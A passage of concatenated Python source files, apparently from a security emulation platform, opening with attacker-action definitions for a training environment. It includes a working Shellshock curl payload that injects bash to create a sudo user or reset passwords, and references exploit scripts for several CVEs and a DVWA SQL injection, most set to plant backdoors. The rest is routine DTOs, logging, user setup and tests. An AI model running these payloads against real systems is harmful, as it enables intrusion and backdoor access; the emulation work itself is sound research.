                                             "then sets up a SSH backdoor to upgrade the channel",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS,
                                       alt_cmds=None,
                                       vulnerability=constants.SAMBA.VULNERABILITY_NAME,
                                       backdoor=True)

    @staticmethod
    def SHELLSHOCK_EXPLOIT(index: int) -> EmulationAttackerAction:
        """
        Launches the shellshock exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.SHELLSHOCK_EXPLOIT
        cmd = ["curl -H \"user-agent: () {{ :; }}; echo; echo; /bin/bash -c "
               "'sudo useradd -rm -d /home/{} -s /bin/bash -g root -G sudo "
               "-p $(openssl passwd -1 \'{}\') {}'\" http://{}:80/cgi-bin/vulnerable",
               "curl -H \"user-agent: () {{ :; }}; echo; echo; /bin/bash -c 'echo {}:{} | sudo /usr/sbin/chpasswd'\" "
               "http://{}:80/cgi-bin/vulnerable"
               ]
        return EmulationAttackerAction(id=id, name="ShellShock Explolit", cmds=cmd,
                                       type=EmulationAttackerActionType.EXPLOIT,
                                       descr="Uses the Shellshock exploit and curl to do "
                                             "remote code execution and create a backdoor",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS,
                                       alt_cmds=None,
                                       vulnerability=constants.SHELLSHOCK.VULNERABILITY_NAME,
                                       backdoor=True)

    @staticmethod
    def DVWA_SQL_INJECTION(index: int) -> EmulationAttackerAction:
        """
        Launches the  DVWA SQL Injection exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.DVWA_SQL_INJECTION
        cmd = ["/sql_injection_exploit.sh"]
        return EmulationAttackerAction(id=id, name="DVWA SQL Injection Exploit", cmds=cmd,
                                       type=EmulationAttackerActionType.EXPLOIT,
                                       descr="Uses the DVWA SQL Injection exploit to extract secret passwords",
                                       index=index,
                                       ips=[],
                                       action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None,
                                       vulnerability=constants.DVWA_SQL_INJECTION.VULNERABILITY_NAME,
                                       backdoor=True)

    @staticmethod
    def CVE_2015_3306_EXPLOIT(index: int) -> EmulationAttackerAction:
        """
        Launches the CVE-2015-3306 exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.CVE_2015_3306_EXPLOIT
        cmd = ["sudo /root/miniconda3/bin/python3 /cve_2015_3306_exploit.py "
               "--port 21 --path '/var/www/html/' --host {}"]
        return EmulationAttackerAction(
            id=id, name="CVE-2015-3306 exploit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT,
            descr="Uses the CVE-2015-3306 vulnerability to get remote code execution and then sets up a SSH backdoor "
                  "to upgrade the channel", index=index, ips=[],
            action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None,
            vulnerability=constants.CVE_2015_3306.VULNERABILITY_NAME, backdoor=True)

    @staticmethod
    def CVE_2015_1427_EXPLOIT(index: int) -> EmulationAttackerAction:
        """
        Launches the CVE-2015-1427 exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.CVE_2015_1427_EXPLOIT
        cmd = ["/cve_2015_1427_exploit.sh {}:9200"]
        return EmulationAttackerAction(
            id=id, name="CVE-2015-1427 exploit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT,
            descr="Uses the CVE-2015-1427 vulnerability to get remote code execution and then sets up a SSH backdoor "
                  "to upgrade the channel", index=index, ips=[],
            action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None,
            vulnerability=constants.CVE_2015_1427.VULNERABILITY_NAME, backdoor=True)

    @staticmethod
    def CVE_2016_10033_EXPLOIT(index: int) -> EmulationAttackerAction:
        """
        Launches the CVE-2016-10033 exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.CVE_2016_10033_EXPLOIT
        cmd = ["/cve_2016_10033_exploit.sh {}:80"]
        return EmulationAttackerAction(id=id, name="CVE-2016-10033 exploit", cmds=cmd,
                                       type=EmulationAttackerActionType.EXPLOIT,
                                       descr="Uses the CVE-2016-10033 vulnerability to get remote "
                                             "code execution and then sets up a SSH backdoor "
                                             "to upgrade the channel",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS,
                                       alt_cmds=None,
                                       vulnerability=constants.CVE_2016_10033.VULNERABILITY_NAME,
                                       backdoor=True)

    @staticmethod
    def CVE_2010_0426_PRIV_ESC(index: int) -> EmulationAttackerAction:
        """
        Launches the CVE-2010-0426 exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.CVE_2010_0426_PRIV_ESC
        cmd = ["/cve_2010_0426_exploit.sh {}", "/create_backdoor_cve_2010_0426.sh"]
        return EmulationAttackerAction(id=id, name="CVE-2010-0426 exploit", cmds=cmd,
                                       type=EmulationAttackerActionType.PRIVILEGE_ESCALATION,
                                       descr="Uses the CVE-2010-0426 vulnerability to "
                                             "perform privilege escalation to get root access",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.PRIVILEGE_ESCALATION_ROOT,
                                       alt_cmds=None,
                                       vulnerability=constants.CVE_2010_0426.VULNERABILITY_NAME,
                                       backdoor=True)

    @staticmethod
    def CVE_2015_5602_PRIV_ESC(index: int) -> EmulationAttackerAction:
        """
        Launches the CVE-2015-5602 exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.CVE_2015_5602_PRIV_ESC
        cmd = ["/cve_2015_5602_exploit.sh", "su root", constants.CVE_2015_5602.ROOT_PW,
               "/create_backdoor_cve_2015_5602.sh"]
        return EmulationAttackerAction(id=id, name="CVE-2015-5602 exploit", cmds=cmd,
                                       type=EmulationAttackerActionType.PRIVILEGE_ESCALATION,
                                       descr="Uses the CVE-2015-5602 vulnerability to perform "
                                             "privilege escalation to get root access",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.PRIVILEGE_ESCALATION_ROOT,
                                       alt_cmds=None, vulnerability=constants.CVE_2015_5602.VULNERABILITY_NAME,
                                       backdoor=True)



from typing import List, Dict, Any
from csle_base.json_serializable import JSONSerializable


class MCMCPosterior(JSONSerializable):
    """
    A DTO representing a posterior obtained through MCMC
    """

    def __init__(self, posterior_name: str, samples: List[float], densities: List[float],
                 sample_space: List[float]) -> None:
        """
        Initializes the DTO

        :param posterior_name: the name of the posterior
        :param samples: samples from the posterior
        :param densities: densities from the posterior
        :param sample_space: the set of unique values (sample space)
        """
        self.posterior_name = posterior_name
        self.samples = samples
        self.densities = densities
        self.sample_space = sample_space

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "MCMCPosterior":
        """
        Converts a dict representation of the DTO into an instance

        :param d: the dict to convert
        :return: the converted instance
        """
        return MCMCPosterior(posterior_name=d["posterior_name"], samples=d["samples"], densities=d["densities"],
                             sample_space=d["sample_space"])

    def to_dict(self) -> Dict[str, Any]:
        """
        :return: a dict representation of the DTO
        """
        d: Dict[str, Any] = {}
        d["posterior_name"] = self.posterior_name
        d["samples"] = self.samples
        d["densities"] = self.densities
        d["sample_space"] = self.sample_space
        return d

    def __str__(self) -> str:
        """
        :return: a string representation of the DTO
        """
        return f"posterior_name:{self.posterior_name}, samples: {self.samples}, densities: {self.densities}, " \
               f"sample_space: {self.sample_space}"

    @staticmethod
    def from_json_file(json_file_path: str) -> "MCMCPosterior":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return MCMCPosterior.from_dict(json.loads(json_str))



import logging
import os
from typing import Dict
import datetime
import sys
import csle_common.constants.constants as constants
from csle_common.logging.custom_formatter import CustomFormatter


class SingletonType(type):
    """
    Singleton type class
    """
    _instances: Dict[str, str] = {}

    def __call__(cls, *args, **kwargs):
        """
        Creates the singleton

        :param args: argument
        :param kwargs: keyword arguments
        :return: the instance
        """
        if cls not in cls._instances:  # type: ignore
            cls._instances[cls] = super(SingletonType, cls).__call__(*args, **kwargs)  # type: ignore
        return cls._instances[cls]  # type: ignore


class Logger(metaclass=SingletonType):
    """
    Centralized class that handles log-management in csle
    """

    _logger = None
    _log_path = ""

    def __init__(self):
        """
        Creates a log file and returns a logger object

        :return: the logger object
        """
        log_dir = constants.LOGGING.DEFAULT_LOG_DIR

        now = datetime.datetime.now()
        log_file_name = now.strftime("%Y-%m-%d-%H-%M") + ".log"

        # Build Log File Full Path
        log_path = os.path.join(log_dir, (str(log_file_name)))

        # Create logger object and set the format for logging and other attributes
        self.logger = logging.Logger(log_file_name)
        self.logger.setLevel(logging.INFO)

        try:
            self.setup_logfile(log_path=log_path, logger=self.logger)
        except Exception:
            log_path = os.path.join(".", (str(log_file_name)))
            self.setup_logfile(log_path=log_path, logger=self.logger)

    def setup_logfile(self, log_path, logger) -> None:
        """
        Sets up the log file

        :param log_path: the path to the log file
        :param logger: the logger object
        :return: None
        """
        handler = logging.FileHandler(log_path, 'a+')
        os.chmod(log_path, 0o777)
        handler.setFormatter(
            CustomFormatter('%(asctime)s - %(levelname)-10s - %(filename)s - %(funcName)s - %(message)s'))
        logger.addHandler(handler)
        handler = logging.StreamHandler(sys.stdout)  # type: ignore
        logger.addHandler(handler)
        self.logger = logger
        self._log_path = log_path
        sys.excepthook = handle_exception

    def get_logger(self) -> logging.Logger:
        """
        :return: the CSLE logger
        """
        # Create Log file directory if not exists
        if not os.path.exists(self._log_path):
            print(f"Log outputs are stored at: {self._log_path}")
            os.makedirs(self._log_path)
        return self.logger

    def get_log_file_path(self) -> str:
        """
        :return: the path where the log file is stored
        """
        return self._log_path


def handle_exception(exc_type, exc_value, exc_traceback) -> None:
    """
    Utility function for handling a given exception

    :param exc_type: the type of the exception
    :param exc_value: the value of the exception
    :param exc_traceback: the traceback of the exception
    :return: None
    """
    if issubclass(exc_type, KeyboardInterrupt):
        sys.__excepthook__(exc_type, exc_value, exc_traceback)
        return
    Logger.__call__().get_logger().error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))



from typing import Optional, Dict, Any
from csle_common.dao.emulation_config.transport_protocol import TransportProtocol
from csle_base.json_serializable import JSONSerializable


class Credential(JSONSerializable):
    """
    A DTO Class to represent a credential to a service of some component in the infrastructure
    """

    def __init__(self, username: str, pw: str, port: int = -1, protocol: Optional[TransportProtocol] = None,
                 service: Optional[str] = None, root: bool = False):
        """
        Initializes the DTO

        :param username: the username of the credential
        :param pw: the password of the credential
        :param port: the port of the service of the credential
        :param protocol: the protocol of the service of the credential
        :param service: the service of the credential
        :param root: whether it is a root credential or not
        """
        self.username = username
        self.pw = pw
        self.port = port
        self.protocol = protocol
        self.service = service
        self.root = root

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation
        
        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        d["username"] = self.username
        d["pw"] = self.pw
        d["port"] = self.port
        if self.protocol is not None:
            d["protocol"] = self.protocol.name
        else:
            d["protocol"] = None
        d["service"] = self.service
        d["root"] = self.root
        return d

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "Credential":
        """
        Convert a dict representation to a DTO representation

        :return: a dto representation of the object
        """
        protocol = None
        if d["protocol"] is not None:
            protocol = TransportProtocol._from_str(d["protocol"])
        dto = Credential(username=d["username"], port=d["port"], protocol=protocol,
                         pw=d["pw"], service=d["service"], root=d["root"])
        return dto

    def __str__(self) -> str:
        """
        :return: a string representation of the credential
        """
        return f"username:{self.username}, pw:{self.pw}, port:{self.port}, protocol:{self.protocol}, " \
               f"service:{self.service}, root:{self.root}"

    def __eq__(self, other) -> bool:
        """
        Tests equality

        :param other: the credential to test equality with
        :return: true if equal otherwise false
        """
        if not isinstance(other, Credential):
            # don't attempt to compare against unrelated types
            return NotImplemented

        return self.username == other.username and self.pw == other.pw and self.service == other.service

    def __hash__(self) -> int:
        """
        :return: a hash representation of the object
        """
        return hash(self.username) + 31 * hash(self.pw) + 31 * hash(self.service)

    @staticmethod
    def from_json_file(json_file_path: str) -> "Credential":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return Credential.from_dict(json.loads(json_str))

    def copy(self) -> "Credential":
        """
        :return: a copy of the DTO
        """
        return Credential.from_dict(self.to_dict())

    def num_attributes(self) -> int:
        """
        :return: The number of attribute of the DTO
        """
        return 6

    @staticmethod
    def schema() -> "Credential":
        """
        :return: get the schema of the DTO
        """
        return Credential(username="", pw="", port=-1, protocol=TransportProtocol.TCP, service="", root=False)



from typing import List, Dict, Any
from csle_common.dao.emulation_action_result.nikto_vuln import NiktoVuln
from csle_base.json_serializable import JSONSerializable


class NiktoScanResult(JSONSerializable):
    """
    DTO representing the result of a NiktoScan
    """

    def __init__(self, vulnerabilities: List[NiktoVuln], port: int, ip: str, sitename: str):
        """
        Initializes the DTO

        :param vulnerabilities: the list of found vulnerabilities from the scan
        :param port: the port of the scan
        :param ip: the ip of the scan
        :param sitename: the sitename of the scan
        """
        self.vulnerabilities = vulnerabilities
        self.port = port
        self.ip = ip
        self.sitename = sitename

    def __str__(self) -> str:
        """
        :return: a string representation of the object
        """
        return f"ip:{self.ip}, port:{self.port}, sitename:{self.sitename}, " \
               f"vulnerabilities:{' '.join(list(map(lambda x: str(x), self.vulnerabilities)))}"

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation

        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        d["port"] = self.port
        d["ip"] = self.ip
        d["sitename"] = self.sitename
        d["vulnerabilities"] = list(map(lambda x: x.to_dict(), self.vulnerabilities))
        return d

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "NiktoScanResult":
        """
        Converts a dict representation to an instance

        :param d: the dict to convert
        :return: the created instance
        """
        obj = NiktoScanResult(
            vulnerabilities=list(map(lambda x: NiktoVuln.from_dict(x), d["vulnerabilities"])),
            port=d["port"], ip=d["ip"], sitename=d["sitename"]
        )
        return obj

    @staticmethod
    def from_json_file(json_file_path: str) -> "NiktoScanResult":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return NiktoScanResult.from_dict(json.loads(json_str))



from typing import Dict, Any, List
from csle_common.dao.training.experiment_config import ExperimentConfig
from csle_common.dao.training.experiment_result import ExperimentResult
from csle_common.dao.simulation_config.simulation_trace import SimulationTrace
from csle_base.json_serializable import JSONSerializable


class TrainingJobConfig(JSONSerializable):
    """
    DTO representing the configuration of a training job
    """

    def __init__(self, simulation_env_name: str, experiment_config: ExperimentConfig,
                 progress_percentage: float, pid: int, experiment_result: ExperimentResult,
                 emulation_env_name: str, simulation_traces: List[SimulationTrace],
                 num_cached_traces: int, log_file_path: str, descr: str, physical_host_ip: str) -> None:
        """
        Initializes the DTO

        :param simulation_env_name: the simulation environment name
        :param simulation_env_name: the emulation environment name
        :param experiment_config: the experiment configuration
        :param progress_percentage:the progress of the job in percentage
        :param pid: the pid of the process
        :param experiment_result: the result of the job
        :param emulation_env_config: the configuration of the emulation environment
        :param simulation_env_config: the configuration of the simulation environment
        :param simulation_traces: the list of simulation traces
        :param num_cached_traces: number of cached simulation traces
        :param descr: description of the job
        :param physical_host_ip: the IP of the physical host where the job is running
        """
        self.simulation_env_name = simulation_env_name
        self.emulation_env_name = emulation_env_name
        self.experiment_config = experiment_config
        self.experiment_result = experiment_result
        self.progress_percentage = round(progress_percentage, 3)
        self.pid = pid
        self.id = -1
        self.running = False
        self.simulation_traces = simulation_traces
        self.num_cached_traces = num_cached_traces
        self.log_file_path = log_file_path
        self.descr = descr
        self.physical_host_ip = physical_host_ip

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation
        
        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        d["simulation_env_name"] = self.simulation_env_name
        d["emulation_env_name"] = self.emulation_env_name
        d["experiment_config"] = self.experiment_config.to_dict()
        d["progress_percentage"] = round(self.progress_percentage, 2)
        d["pid"] = self.pid
        d["id"] = self.id
        d["experiment_result"] = self.experiment_result.to_dict()
        d["running"] = self.running
        d["simulation_traces"] = list(map(lambda x: x.to_dict(), self.simulation_traces))
        d["num_cached_traces"] = self.num_cached_traces
        d["log_file_path"] = self.log_file_path
        d["descr"] = self.descr
        d["physical_host_ip"] = self.physical_host_ip
        return d

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "TrainingJobConfig":
        """
        Converts a dict representation of the object to an instance
        :param d: the dict to convert
        :return: the created instance
        """
        obj = TrainingJobConfig(
            simulation_env_name=d["simulation_env_name"],
            experiment_config=ExperimentConfig.from_dict(d["experiment_config"]),
            progress_percentage=d["progress_percentage"], pid=d["pid"],
            experiment_result=ExperimentResult.from_dict(d["experiment_result"]),
            emulation_env_name=d["emulation_env_name"],
            simulation_traces=list(map(lambda x: SimulationTrace.from_dict(x), d["simulation_traces"])),
            num_cached_traces=d["num_cached_traces"], log_file_path=d["log_file_path"], descr=d["descr"],
            physical_host_ip=d["physical_host_ip"])
        obj.id = d["id"]
        obj.running = d["running"]
        return obj

    def __str__(self) -> str:
        """
        :return: a string representation of the object
        """
        return f"simulation_env_name: {self.simulation_env_name}, experiment_config: {self.experiment_config}, " \
               f"progress_percentage: {self.progress_percentage}, pid: {self.pid}," \
               f"id: {self.id}, experiment_result: {self.experiment_result}, running: {self.running}, " \
               f"emulation_env_name: {self.emulation_env_name}, " \
               f"simulation_traces: {list(map(lambda x: str(x), self.simulation_traces))}," \
               f"num_cached_traces: {self.num_cached_traces}, log_file_path: {self.log_file_path}, " \
               f"descr: {self.descr}, physical_host_ip: {self.physical_host_ip}"

    @staticmethod
    def from_json_file(json_file_path: str) -> "TrainingJobConfig":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return TrainingJobConfig.from_dict(json.loads(json_str))



import logging

import csle_common.constants.constants as constants
from csle_common.dao.emulation_config.emulation_env_config import EmulationEnvConfig
from csle_common.util.emulation_util import EmulationUtil


class UsersController:
    """
    Class managing users in the emulation environments
    """

    @staticmethod
    def create_users(emulation_env_config: EmulationEnvConfig, physical_server_ip: str, logger: logging.Logger) -> None:
        """
        Creates users in an emulation environment according to a specified users-configuration

        :param emulation_env_config: the emulation env configuration
        :param physical_server_ip: ip of the physical server
        :param logger: the logger to use for logging
        :return: None
        """
        for users_conf in emulation_env_config.users_config.users_configs:
            if users_conf.physical_host_ip != physical_server_ip:
                continue
            logger.info(f"Creating users on container: {users_conf.docker_gw_bridge_ip} ({users_conf.ip})")
            EmulationUtil.connect_admin(emulation_env_config=emulation_env_config, ip=users_conf.docker_gw_bridge_ip)

            cmd = "ls /home"
            o, e, _ = EmulationUtil.execute_ssh_cmd(cmd=cmd, conn=emulation_env_config.connections[
                users_conf.docker_gw_bridge_ip])
            users_w_home = o.decode().split("\n")
            users_w_home = list(filter(lambda x: x != '', users_w_home))

            for user in users_w_home:
                if user != constants.CSLE_ADMIN.SSH_USER:
                    cmd = "sudo deluser {}".format(user)
                    EmulationUtil.execute_ssh_cmd(cmd=cmd,
                                                  conn=emulation_env_config.connections[users_conf.docker_gw_bridge_ip])
                    cmd = "sudo rm -rf /home/{}".format(user)
                    EmulationUtil.execute_ssh_cmd(cmd=cmd,
                                                  conn=emulation_env_config.connections[users_conf.docker_gw_bridge_ip])

            for user in users_conf.users:
                if user.root:
                    cmd = "sudo useradd -rm -d /home/{} -s /bin/bash -g root -G sudo -p " \
                          "\"$(openssl passwd -1 '{}')\" {}".format(user.username, user.pw, user.username)
                else:
                    cmd = "sudo useradd -rm  -d /home/{} -s /bin/bash -g {}" \
                          "-p \"$(openssl passwd -1 '{}')\" {}".format(user.username, user.username, user.pw,
                                                                       user.username)
                o, e, _ = EmulationUtil.execute_ssh_cmd(cmd=cmd, conn=emulation_env_config.connections[
                    users_conf.docker_gw_bridge_ip])

            EmulationUtil.disconnect_admin(emulation_env_config=emulation_env_config)

        for vuln in emulation_env_config.vuln_config.node_vulnerability_configs:
            if vuln.physical_host_ip != physical_server_ip:
                continue
            EmulationUtil.connect_admin(emulation_env_config=emulation_env_config, ip=vuln.docker_gw_bridge_ip)
            if vuln.credentials is None:
                raise ValueError("Could not find credentials corresponding to node vulnerability config.")
            for cr in vuln.credentials:
                if cr.root:
                    cmd = "sudo useradd -rm -d /home/{} -s /bin/bash -g root -G sudo -p " \
                          "\"$(openssl passwd -1 '{}')\" {}".format(cr.username, cr.pw, cr.username)
                else:
                    cmd = "sudo useradd -rm -d /home/{} -s /bin/bash -g {} " \
                          "-p \"$(openssl passwd -1 '{}')\" {}".format(cr.username, cr.username, cr.pw, cr.username)
                o, e, _ = EmulationUtil.execute_ssh_cmd(
                    cmd=cmd, conn=emulation_env_config.get_connection(ip=vuln.docker_gw_bridge_ip))

            EmulationUtil.disconnect_admin(emulation_env_config=emulation_env_config)



"""
Type of attack actions
"""
from enum import IntEnum


class EmulationAttackerActionType(IntEnum):
    """
    Enum representing the different attack types in the emulation.
    """
    RECON = 0
    EXPLOIT = 1
    POST_EXPLOIT = 2
    PRIVILEGE_ESCALATION = 3
    STOP = 4
    CONTINUE = 5



from typing import List, Tuple, Dict, Any, Sequence, Optional
from csle_common.dao.emulation_config.node_network_config import NodeNetworkConfig
from csle_common.util.general_util import GeneralUtil
from csle_base.json_serializable import JSONSerializable


class NodeResourcesConfig(JSONSerializable):
    """
    A DTO object representing the resources of a specific container in an emulation environment
    """

    def __init__(self, container_name: str,
                 num_cpus: int, available_memory_gb: int,
                 ips_and_network_configs: Sequence[Tuple[str, Optional[NodeNetworkConfig]]],
                 docker_gw_bridge_ip: str = "", physical_host_ip: str = "",
                 disk_space_gb: int = 100):
        """
        Initializes the DTO

        :param container_name: the name of the container
        :param num_cpus: the number of CPUs available to the node
        :param available_memory_gb: the number of RAM GB available to the node
        :param ips_and_network_configs: list of ip adresses and network configurations
        :param docker_gw_bridge_ip: IP to reach the container from the host network
        :param physical_host_ip: IP of the physical host where the container is running
        :param disk_space_gb: the amount of disk space in GB available to the node
        """
        self.container_name = container_name
        self.num_cpus = num_cpus
        self.available_memory_gb = available_memory_gb
        self.ips_and_network_configs = ips_and_network_configs
        self.docker_gw_bridge_ip = docker_gw_bridge_ip
        self.physical_host_ip = physical_host_ip
        self.disk_space_gb = disk_space_gb

    def get_ips(self) -> List[str]:
        """
        :return: a list of ips
        """
        return list(map(lambda x: x[0], self.ips_and_network_configs))

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "NodeResourcesConfig":
        """
        Converts a dict representation into an instance

        :param d: the dict to convert
        :return: the created instance
        """
        ips_and_network_configs = []
        for ip, cfg in d["ips_and_network_configs"]:
            if cfg is not None:
                parsed_cfg = NodeNetworkConfig.from_dict(cfg)
            else:
                parsed_cfg = NodeNetworkConfig()
            ips_and_network_configs.append((str(ip), parsed_cfg))
        obj = NodeResourcesConfig(
            container_name=d["container_name"],
            ips_and_network_configs=ips_and_network_configs,
            num_cpus=d["num_cpus"], available_memory_gb=d["available_memory_gb"],
            docker_gw_bridge_ip=d["docker_gw_bridge_ip"], physical_host_ip=d["physical_host_ip"],
            disk_space_gb=d["disk_space_gb"]
        )
        return obj

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation

        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        d["container_name"] = self.container_name
        d["ips_and_network_configs"] = list(map(lambda x: (x[0], None if x[1] is None else x[1].to_dict()),
                                                self.ips_and_network_configs))
        d["num_cpus"] = self.num_cpus
        d["available_memory_gb"] = self.available_memory_gb
        d["docker_gw_bridge_ip"] = self.docker_gw_bridge_ip
        d["physical_host_ip"] = self.physical_host_ip
        d["disk_space_gb"] = self.disk_space_gb
        return d

    def __str__(self) -> str:
        """
        :return: a string representation of the node's resources
        """
        return f"num_cpus: {self.num_cpus}, available_memory_gb:{self.available_memory_gb}, " \
               f"container_name:{self.container_name}, ips_and_network_configs: {self.ips_and_network_configs}," \
               f"docker_gw_bridge_ip: {self.docker_gw_bridge_ip}, physical_host_ip: {self.physical_host_ip}," \
               f"disk_space_gb: {self.disk_space_gb}"

    @staticmethod
    def from_json_file(json_file_path: str) -> "NodeResourcesConfig":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return NodeResourcesConfig.from_dict(json.loads(json_str))

    def copy(self) -> "NodeResourcesConfig":
        """
        :return: a copy of the DTO
        """
        return NodeResourcesConfig.from_dict(self.to_dict())

    def create_execution_config(self, ip_first_octet: int) -> "NodeResourcesConfig":
        """
        Creates a new config for an execution

        :param ip_first_octet: the first octet of the IP of the new execution
        :return: the new config
        """
        config = self.copy()
        config.container_name = config.container_name + f"_{ip_first_octet}"
        config.ips_and_network_configs = list(map(lambda x: (GeneralUtil.replace_first_octet_of_ip(
            ip=x[0], ip_first_octet=ip_first_octet), x[1]), config.ips_and_network_configs))
        return config

    @staticmethod
    def schema() -> "NodeResourcesConfig":
        """
        :return: get the schema of the DTO
        """
        return NodeResourcesConfig(container_name="", num_cpus=1, available_memory_gb=1,
                                   ips_and_network_configs=[("", NodeNetworkConfig.schema())], disk_space_gb=100)



"""
Type of SDN controllers in CSLE
"""

from enum import IntEnum


class SDNControllerType(IntEnum):
    """
    Enum representing the different SDN controller types supported in CSLE
    """
    RYU = 0



from unittest.mock import MagicMock, patch
from csle_common.consumer_threads.aggregated_host_metrics_thread import AggregatedHostMetricsThread
from csle_collector.host_manager.dao.host_metrics import HostMetrics


class TestSuiteAggregatedHostMetricsThread:
    """
    Test suite for AggregatedHostMetricsThread
    """
    def test_initialization(self) -> None:
        """
        Test the initialization function

        :return: None
        """
        host_metrics = HostMetrics
        mock_machine = MagicMock(spec='EmulationDefenderMachineObservationState')
        mock_machines = [mock_machine, mock_machine]
        sleep_time = 3
        thread = AggregatedHostMetricsThread(host_metrics=host_metrics, machines=mock_machines, sleep_time=sleep_time)
        assert thread.host_metrics == host_metrics
        assert thread.machines == mock_machines
        assert thread.sleep_time == sleep_time

    @patch("time.sleep", return_value=None)
    def test_run(self, mock_sleep) -> None:
        """
        Test the method that runs the thread

        :param mock_sleep: mock_sleep
        :return: None
        """
        mock_host_metrics_1 = MagicMock(spec="HostMetrics")
        mock_host_metrics_1.num_logged_in_users = 5
        mock_host_metrics_1.num_failed_login_attempts = 2
        mock_host_metrics_1.num_open_connections = 10
        mock_host_metrics_1.num_login_events = 7
        mock_host_metrics_1.num_processes = 50
        mock_host_metrics_1.num_users = 3

        mock_host_metrics_2 = MagicMock(spec="HostMetrics")
        mock_host_metrics_2.num_logged_in_users = 3
        mock_host_metrics_2.num_failed_login_attempts = 1
        mock_host_metrics_2.num_open_connections = 5
        mock_host_metrics_2.num_login_events = 4
        mock_host_metrics_2.num_processes = 30
        mock_host_metrics_2.num_users = 2

        mock_machine_1 = MagicMock(spec="EmulationDefenderMachineObservationState")
        mock_machine_1.host_metrics = mock_host_metrics_1

        mock_machine_2 = MagicMock(spec="EmulationDefenderMachineObservationState")
        mock_machine_2.host_metrics = mock_host_metrics_2

        mock_machines = [mock_machine_1, mock_machine_2]

        mock_aggregated_host_metrics = MagicMock(spec="HostMetrics")
        mock_aggregated_host_metrics.copy = MagicMock(spec="HostMetrics")
        mock_aggregated_host_metrics.copy.return_value = MagicMock(spec="HostMetrics")

        sleep_time = 1

        thread = AggregatedHostMetricsThread(
            host_metrics=mock_aggregated_host_metrics, machines=mock_machines, sleep_time=sleep_time
        )

        def stop_running(*args, **kwargs):
            thread.running = False

        mock_sleep.side_effect = stop_running
        thread.run()
        assert thread.host_metrics.num_logged_in_users == 8
        assert thread.host_metrics.num_failed_login_attempts == 3
        assert thread.host_metrics.num_open_connections == 15
        assert thread.host_metrics.num_login_events == 11
        assert thread.host_metrics.num_processes == 80
        assert thread.host_metrics.num_users == 5

    def test_get_average_aggregated_host_metrics(self) -> None:
        """
        Test the method that returns the average of the list of aggregated host metrics

        :return: None
        """
        mock_host_metrics_1 = MagicMock(spec="HostMetrics")
        mock_host_metrics_1.num_logged_in_users = 10
        mock_host_metrics_1.num_failed_login_attempts = 5
        mock_host_metrics_1.num_open_connections = 15
        mock_host_metrics_1.num_login_events = 20
        mock_host_metrics_1.num_processes = 25
        mock_host_metrics_1.num_users = 30

        mock_host_metrics_2 = MagicMock(spec="HostMetrics")
        mock_host_metrics_2.num_logged_in_users = 20
        mock_host_metrics_2.num_failed_login_attempts = 10
        mock_host_metrics_2.num_open_connections = 25
        mock_host_metrics_2.num_login_events = 30
        mock_host_metrics_2.num_processes = 35
        mock_host_metrics_2.num_users = 40

        thread = AggregatedHostMetricsThread(
            host_metrics=MagicMock(spec="HostMetrics"), machines=[], sleep_time=1
        )
        thread.host_metrics_list = [mock_host_metrics_1, mock_host_metrics_2]
        avg_metrics = thread.get_average_aggregated_host_metrics()
        assert avg_metrics.num_logged_in_users == 15
        assert avg_metrics.num_failed_login_attempts == 8
        assert avg_metrics.num_open_connections == 20
        assert avg_metrics.num_login_events == 25
        assert avg_metrics.num_processes == 30
        assert avg_metrics.num_users == 35



from typing import Dict, Any
from csle_base.json_serializable import JSONSerializable


class NmapHop(JSONSerializable):
    """
    DTO representing a Nmap Hop
    """

    def __init__(self, ttl: int, ipaddr: str, rtt: float, host: str):
        """
        Initializes the object

        :param ttl: the TTL of the hop
